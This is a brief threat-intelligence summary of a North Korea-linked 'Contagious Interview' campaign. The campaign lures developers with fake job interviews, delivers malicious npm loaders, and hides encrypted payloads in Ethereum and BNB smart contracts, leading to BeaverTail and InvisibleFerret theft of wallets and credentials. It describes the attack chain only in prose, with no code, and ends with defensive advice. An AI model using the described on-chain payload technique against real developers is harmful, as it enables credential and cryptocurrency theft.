Google Threat Intelligence observed UNC5342 (aka CL-STA-0240/ DeceptiveDevelopment/ Famous Chollima/ Void Dokkaebi, among others) using EtherHiding, embedding encrypted payloads in smart contracts on decentralised networks such as Ethereum and BNB Smart Chain, to deliver malware since February 2025.
Developers in crypto, fintech and software sectors recruited via LinkedIn and lured to Telegram/Discord; artifacts distributed via GitHub/npm. Cross-platform impact: Windows, macOS, Linux. Targets include MetaMask, Phantom, browser extensions, and password managers (e.g., 1Password).
Social-engineering “Contagious Interview” scam pushes malicious npm/JavaScript loaders. A small loader queries public blockchain smart contracts (read-only calls via centralized API services) to fetch encrypted payloads. Chain: npm initial downloader → BeaverTail stealer (JS) → JADESNOW loader → InvisibleFerret (JS/Python backdoor). Attackers can update on-chain payloads (average gas costing ≈ $1.37) and switch chains to evade tracking.
The campaign enables credential and wallet theft, persistent remote access for long-term espionage, and direct siphoning of cryptocurrency from targeted wallets. Immutable on-chain hosting prevents traditional takedowns and obscures attribution.
No software patch possible (blockchain is not vulnerable). Google published indicators, contract addresses, and hashes; some API providers have begun throttling suspicious access. Enforce exec/download policies, block/monitor blockchain API endpoints, vet npm/GitHub packages, enable enterprise Safe Browsing, apply EDR/credential-theft detections, and restrict portable Python execution.
Nation-state actors now weaponize decentralized ledgers as takedown-resistant C2/dead-drops, defenders must treat blockchain access as a monitored attack surface and harden developer supply-chain controls.
Caught feelings for cybersecurity? It’s okay, it happens. Follow us on LinkedIn and Instagram to keep the spark alive.
